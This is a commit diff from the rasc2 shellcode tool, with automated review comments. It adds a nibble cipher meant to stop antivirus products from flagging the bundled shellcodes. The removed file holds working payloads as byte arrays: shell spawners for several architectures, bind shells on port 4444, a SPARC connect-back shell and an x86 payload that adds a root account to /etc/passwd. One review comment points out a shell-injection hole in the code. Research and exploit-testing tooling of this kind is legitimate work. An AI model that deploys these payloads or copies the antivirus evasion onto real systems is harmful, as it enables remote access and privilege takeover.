* Implement simple ciphering algorithm to bundle rasc2 shellcodes

- Should trick some silly antiviruses into no longer flagging
    the w32 build as malware
* Unify the python-config-wrapper scripts

--HG--
rename : binr/rasc2/shellcodes.c => binr/rasc2/shellcodes.c.src
pancake 2011-05-15 03:33:31 +02:00
parent 7a4343aa1e
commit db61c1640a
10 changed files with 1057 additions and 961 deletions


@ -14,7 +14,7 @@ all: ${BIN}${EXT_EXE}
${BIN}${EXT_EXE}: ${BIN}.o ${OBJS}
${CC} -o ${BIN}${EXT_EXE} ${OBJS} ${BIN}.o ${LIBS} ${LDFLAGS}
clean:
clean: ${MYCLEAN}
-rm -f ${BIN} ${BIN}.o ${OBJS}
mrproper: clean


@ -1,5 +1,20 @@
BIN=rasc2
DEPS=
MYCLEAN=myclean
OBJS=shellcodes.o test.o
preall: shellcodes.c
${MAKE} all
xorhex: xorhex.o
${CC} xorhex.o -o xorhex
shellcodes.c: xorhex
./xorhex < shellcodes.c.src > shellcodes.c
./xorhex decode < shellcodes.c > shellcodes.c.new
diff -ru shellcodes.c.src shellcodes.c.new
myclean:
rm -f shellcodes.c xorhex.o
include ../binr.mk
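Review bot: The `shellcodes.c: xorhex` recipe writes the encoded output straight to `shellcodes.c` before the round-trip check runs, so if `diff -ru shellcodes.c.src shellcodes.c.new` fails make stops with a bad `shellcodes.c` already in place, and the next `make` treats it as up to date and never re-checks it; encode to a temporary name and only `mv` it into place after the decode compares equal. `myclean` also removes only `shellcodes.c` and `xorhex.o`, leaving the `xorhex` binary and `shellcodes.c.new` behind, and `myclean` (reached via `clean: ${MYCLEAN}`) is not declared `.PHONY`, so a stray file named `myclean` would silence it. Since the commit message says this is aimed at the w32 build, note that `xorhex` is linked with `${CC}` but executed with `./xorhex` on the build host; if `${CC}` is ever a cross compiler there, the generator will not run, so it presumably needs a host compiler variable rather than `${CC}`.
```makefile
# … unchanged: BIN, DEPS, MYCLEAN, OBJS, preall and xorhex rules …
shellcodes.c: xorhex
	./xorhex < shellcodes.c.src > shellcodes.c.tmp
	./xorhex decode < shellcodes.c.tmp | diff -u shellcodes.c.src -
	mv shellcodes.c.tmp shellcodes.c
.PHONY: myclean
myclean:
	rm -f shellcodes.c shellcodes.c.tmp shellcodes.c.new xorhex xorhex.o
```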


@ -177,7 +177,7 @@ int print_shellcode() {
/* patch addr and env */
otf_patch ();
memcpy(output+A+N+E, shellcode, scsize);
memcpy (output+A+N+E, shellcode, scsize);
for (i=0;i<C;i++)
output[i+A+E+N+scsize] = '\xCC';
@ -256,11 +256,26 @@ int hexpair2bin(const char *arg) { // (0A) => 10 || -1 (on error)
return (int)c;
}
void cipher_memcpy(ut8 *dst, ut8 *src, int len) {
int i, n;
for (i=0; i<len; i++) {
n = src[i] & 0xf;
n = n==0xf?0:n+1;
dst[i] = n;
n = src[i] & 0xf0;
n>>=4;
n = n==0xf?0:n+1;
dst[i] |= n<<4;
}
}
int load_shellcode_from_me(char *str) {
int i;
for (i=0;shellcodes[i].name;i++) {
for (i=0; shellcodes[i].name; i++) {
if (!strcmp (shellcodes[i].name, str)) {
memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
//memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
/* cipher shit */
cipher_memcpy (shellcode, shellcodes[i].data, shellcodes[i].len);
scsize = shellcodes[i].len;
scidx = i;
//printf("Using %d bytes shellcode (%s) %02x %02x\n", shellcodes[i].len, shellcodes[i].desc,
@ -293,7 +308,7 @@ int load_shellcode_from_string(char *str) {
return 0;
}
int file_type(char *str) {
static int file_type(char *str) {
if (!strcmp(str,"-"))
return 0; // stdin
if (!strcmp(str+strlen(str)-2,".s"))
@ -301,30 +316,31 @@ int file_type(char *str) {
return 2;
}
int load_shellcode_from_file(char *str) {
static int load_shellcode_from_file(char *str) {
char buf[1024];
char *ptr = NULL;
eprintf ("TODO: This is r1-dependant.. ugly . must dump all disasm\n");
str[1024]='\0';
switch (file_type (str)) {
case 0: // stdin
fprintf (stderr, "TODO\n");
break;
case 1: // .s file (assembly
sprintf(buf, "gcc -nostdlib -o .x %s", str);
system(buf);
system("rsc syms-dump .x | grep _start | cut -d : -f 2 | tee .y");
unlink(".x");
ptr = filetostr(".y");
unlink(".y");
sprintf (buf, "gcc -nostdlib -o .x %s", str);
system (buf);
system ("rsc syms-dump .x | grep _start | cut -d : -f 2 | tee .y");
unlink (".x");
ptr = filetostr (".y");
unlink (".y");
if (ptr) {
load_shellcode_from_string(ptr);
free(ptr);
}
break;
default:
printf("File format not supported\n");
exit(1);
eprintf ("File format not supported\n");
exit (1);
}
return 0;
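Review bot: The reformatted `sprintf (buf, "gcc -nostdlib -o .x %s", str);` / `system (buf);` pair in the `.s` case still copies an unbounded caller-supplied path into the 1024-byte `buf` (the format prefix alone is 20 bytes) and then hands it to a shell unquoted, so a long path overflows the stack buffer and a path containing shell metacharacters runs as a command; the `str[1024]='\0';` context line above does not bound anything, it stores a byte at offset 1024 of the caller's string, almost certainly past its end. The commit only reformats these lines, but since the function is being touched this is the place to add the check: drop the `str[1024]` store and replace the two lines with `if (strlen (str) + 32 > sizeof (buf) || strpbrk (str, "'`$;|&<>\n")) { eprintf ("Invalid file name\n"); return -1; }` followed by `snprintf (buf, sizeof (buf), "gcc -nostdlib -o .x '%s'", str); system (buf);`. The fixed `.x`/`.y` names in the working directory are also shared with any other instance running there, which is worth a `/* TODO: use mkstemp() */` note. The closing brace of `load_shellcode_from_file` falls outside the hunk.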


@ -1,934 +0,0 @@
/*
* Copyright (C) 2007
* pancake <@youterm.com>
*
* radare is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* radare is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with radare; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
// XXX: shellcodes are ended with '\0'. so they should not contain any '\0'
#include <stdio.h>
#include "rasc.h"
// moar at:
// http://www.groar.org/expl/openbsd/english.shtml
#if SELFSTOP
#define RET 0x80494c0
// 1) buscar jmp de 5 bytes
#define INJECT jmp $delta-$here-10
linux_selfsigstop:
push RET
/* 68 34 de 04 08 */
pusha
mov $20, %eax
int $0x80
mov %eax, %ebx /* pid */
mov $19, %ecx /* stop */
mov $37, %eax /* kill */
int $0x80
popa
ret
freebsd_selfsigstop:
push RET_ADDR
pusha
mov $20, %eax
push %ebp
int $0x80
pop %ebp
push $17
push %eax
mov $37, %eax
push %ebp
int $0x80
pop %ebp
pop %ebp
pop %ebp
popa
ret
#endif
#if 0
// dump warns and it has not been tested.. out!
/* from phrack57 */
unsigned long long ia64_linux_binsh[] = {
/* MLX
* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall
* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01
* ;; */
0x2f6e458006191005,
0x631132f1c0016873,
/* MLX
* xor r37 = r37, r37 // NULL
* movl r17 = 0x48f017994897c001 // bundle[0]
* ;; */
0x9948a00f4a952805,
0x6602e0122048f017,
/* MII
* adds r15 = 0x1094, r37 // unfinished bundle[1]
* or r22 = 0x08, r37 // part 1 of bundle[1]
* dep r12 = r37, r12, 0, 8 // align stack ptr
* ;; */
0x416021214a507801,
0x4fdc625180405c94,
/* MII
* adds r35 = -40, r12 // circling mem addr 1, shellstr addr
* adds r36 = -32, r12 // circling mem addr 2, args[0] addr
* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)
* ;; */
0x0240233f19611801,
0x41dc7961e0467e33,
/* MII
* st8 [r36] = r35, 16 // args[0] = shellstring addr
* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr
* or r23 = 0x42, r37 // part 2 of bundle[1]
* ;; */
0x81301598488c8001,
0x80b92c22e0467e33,
/* MII
* st8 [r36] = r17, 8 // store bundle[0]
* dep r14 = r37, r14, 56, 8 // fix shellstring
* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)
* ;; */
0x28e0159848444001,
0x4bdc7971e020ee39,
/* MMI
* st8 [r35] = r14, 25 // store shellstring
* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.
* mov b6 = r19 // (+0x01) setup branch reg
* ;; */
0x282015984638c801,
0x07010930c0701095,
/* MIB
* st8 [r36] = r15, -16 // store bundle[1]
* adds r35 = -25, r35 // correct string addr
* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle
* ;; */
0x3a301799483f8011,
0x0180016001467e8f,
};
#endif
unsigned char nopcode_carver[] ="\x61\x66\x3D\x90\x90\x75\xF9\x54\xc3";
unsigned char x86_linux_binsh[] =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
unsigned char x86_linux_binsh1[] = // -( nemo )-
"\xeb\x10\x5b\x31\xc0\x50\x53\xb0\x0b\x88\x63\x07\x89\xe1\x31\xd2\xcd\x80\xe8\xeb\xff\xff\xff/bin/shX";
/* 0xcafebabe.it */
unsigned char x86_linux_binsh2[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int mips_linux_binsh[] = {
0x00842026, 0x24020fb7, 0x0000000c, 0x3c086e69, 0x3508622f, 0x3c090068,
0x3529732f, 0xafa80000, 0xafa90004, 0xafbd0008, 0xafa0000c, 0x03a02021,
0x23a50008, 0x00003021, 0x24020fab, 0x0000000c, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000 };
char sparc_linux_binsh[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10";
/* javicoder shellcodes
--------------------- beerware license
http://www.48bits.com/papers/sparc_shellcodes.txt
*/
char sparc_linux_javicoder_binsh[] =
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
"\xdc\xda\x90\x0b\x80\x0e\x82\x10\x20\x0b"
"\x91\xd0\x20\x10\x82\x10\x20\x01\x90\x1a"
"\x40\x09\x91\xd0\x20\x10";
/* listen shell at port 1124 */
char sparc_linux_javicoder_portbind[] =
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46\xe4\x25"
"\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46\x84\x12\x22\xd0"
"\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea\x92\x12\x26\x66\xd2\x39"
"\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe\xa4\x09\xc1\xea\x96\x12\x22\x12"
"\xd2\x25\xa2\x46\xe4\x25\xa2\x4a\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2"
"\x22\x12\xa4\x12\x22\x03\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe"
"\xd6\x25\xa2\x4e\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29"
"\xc1\xfa\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80\x93\xd2"
"\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc\x92\x0d\x82\x10"
"\x84\x12\x22\x0d\x93\xd2\x22\x12";
#if 0
( .. 11 instructions .. ) (+44 bytes+deobfusacte+nops)
mov 0x464, %l1 ! puerto 1124
sethi %hi(0x0a0c2203), %l2 !
or %l2, %lo(0x0a0c2203), %l2 ! direcci?n IP 10.12.34.3
#endif
char sparc_linux_javicoder_connect[] =
/* rutina desofuscadora */
"\x10\x80\x00\x0c\xa4\x1c\x80\x12\xa2\x03\xe0\x08\xe8\x0c\x40\x05"
"\xa4\x04\xa0\x01\xa8\x25\x20\x02\xe8\x2c\x40\x05\x80\xa4\xa0\xc4"
"\x04\xbf\xff\xfb\xa2\x04\x60\x01\x8b\xc3\xe0\x08\xa4\x1c\x80\x12"
"\x7f\xff\xff\xf6\x8a\x19\x40\x05"
/*
* NOPs por la i-cache
*/
"\x03\x02\x02\x02\x03\x02\x02\x02"
/*
* shellcode ofuscada
*/
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46"
"\xe4\x25\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46"
"\x84\x12\x22\xd0\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea"
"\x92\x12\x26\x66\xd2\x39\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe"
"\xa4\x09\xc1\xea\x96\x12\x22\x12\xd2\x25\xa2\x46\xe4\x25\xa2\x4a"
"\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2\x22\x12\xa4\x12\x22\x03"
"\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe\xd6\x25\xa2\x4e"
"\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29\xc1\xfa"
"\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80"
"\x93\xd2\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc"
"\x92\x0d\x82\x10\x84\x12\x22\x0d\x93\xd2\x22\x12";
unsigned char x86_linux_bind4444[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
"\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
"\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
"\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
"\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
"\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";
unsigned char x86_linux_udp4444[] =
"\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
"\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
"\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
"\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
"\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
"\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
"\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";
unsigned char x86_linux_adduser[] =
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73"
"\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd"
"\x80\x93\xe8\x1f\x00\x00\x00\x78\x3a\x41\x7a\x37\x44\x71\x55\x7a\x47\x6a"
"\x77\x69\x4d\x77\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73"
"\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80";
unsigned char x86_bsd_binsh[] =
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51"
"\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd\x80";
unsigned char x86_bsd_binsh2[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53"
"\x50\xb0\x3b\xcd\x80";
unsigned char x86_bsd_bind4444[] =
"\x31\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
"\xd3\x61\x53\x83\xeb\xfc\xe2\xf4\xa4\xb2\x39\xca\x9c\xbb\x71\x51"
"\xdf\x8f\xe8\xb2\x9c\x91\x33\x11\x9c\xb9\x71\x9e\x4e\x4a\xf2\x02"
"\x9d\x81\x0b\x3b\x96\x1e\xe1\xe3\xa4\x1e\xe1\x01\x9d\x81\xd1\x4d"
"\x03\x53\xf6\x39\xcc\x8a\x0b\x09\x96\x82\x36\x02\x03\x53\x28\x2a"
"\x3b\x83\x09\x7c\xe1\xa0\x09\x3b\xe1\xb1\x08\x3d\x47\x30\x31\x07"
"\x9d\x80\xd1\x68\x03\x53\x61\x53";
unsigned char ppc_osx_binsh[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";
unsigned char ppc_osx_bind4444[] =
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";
unsigned char x86_w32_bind4444[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9f"
"\x2a\xdf\x1b\x83\xeb\xfc\xe2\xf4\x63\x40\x34\x56\x77\xd3\x20\xe4"
"\x60\x4a\x54\x77\xbb\x0e\x54\x5e\xa3\xa1\xa3\x1e\xe7\x2b\x30\x90"
"\xd0\x32\x54\x44\xbf\x2b\x34\x52\x14\x1e\x54\x1a\x71\x1b\x1f\x82"
"\x33\xae\x1f\x6f\x98\xeb\x15\x16\x9e\xe8\x34\xef\xa4\x7e\xfb\x33"
"\xea\xcf\x54\x44\xbb\x2b\x34\x7d\x14\x26\x94\x90\xc0\x36\xde\xf0"
"\x9c\x06\x54\x92\xf3\x0e\xc3\x7a\x5c\x1b\x04\x7f\x14\x69\xef\x90"
"\xdf\x26\x54\x6b\x83\x87\x54\x5b\x97\x74\xb7\x95\xd1\x24\x33\x4b"
"\x60\xfc\xb9\x48\xf9\x42\xec\x29\xf7\x5d\xac\x29\xc0\x7e\x20\xcb"
"\xf7\xe1\x32\xe7\xa4\x7a\x20\xcd\xc0\xa3\x3a\x7d\x1e\xc7\xd7\x19"
"\xca\x40\xdd\xe4\x4f\x42\x06\x12\x6a\x87\x88\xe4\x49\x79\x8c\x48"
"\xcc\x79\x9c\x48\xdc\x79\x20\xcb\xf9\x42\xce\x47\xf9\x79\x56\xfa"
"\x0a\x42\x7b\x01\xef\xed\x88\xe4\x49\x40\xcf\x4a\xca\xd5\x0f\x73"
"\x3b\x87\xf1\xf2\xc8\xd5\x09\x48\xca\xd5\x0f\x73\x7a\x63\x59\x52"
"\xc8\xd5\x09\x4b\xcb\x7e\x8a\xe4\x4f\xb9\xb7\xfc\xe6\xec\xa6\x4c"
"\x60\xfc\x8a\xe4\x4f\x4c\xb5\x7f\xf9\x42\xbc\x76\x16\xcf\xb5\x4b"
"\xc6\x03\x13\x92\x78\x40\x9b\x92\x7d\x1b\x1f\xe8\x35\xd4\x9d\x36"
"\x61\x68\xf3\x88\x12\x50\xe7\xb0\x34\x81\xb7\x69\x61\x99\xc9\xe4"
"\xea\x6e\x20\xcd\xc4\x7d\x8d\x4a\xce\x7b\xb5\x1a\xce\x7b\x8a\x4a"
"\x60\xfa\xb7\xb6\x46\x2f\x11\x48\x60\xfc\xb5\xe4\x60\x1d\x20\xcb"
"\x14\x7d\x23\x98\x5b\x4e\x20\xcd\xcd\xd5\x0f\x73\x6f\xa0\xdb\x44"
"\xcc\xd5\x09\xe4\x4f\x2a\xdf\x1b\x00";
unsigned char x86_w32_tcp4444[] =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
"\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
"\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
"\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
"\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
"\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
"\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
"\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
"\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
"\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
"\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
"\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
"\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
"\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
"\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
"\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
"\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
"\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
"\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
"\x7e\xe5\x98\xec\xac\x45\x1b\x13";
char x86_w32_msg[]=
"\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
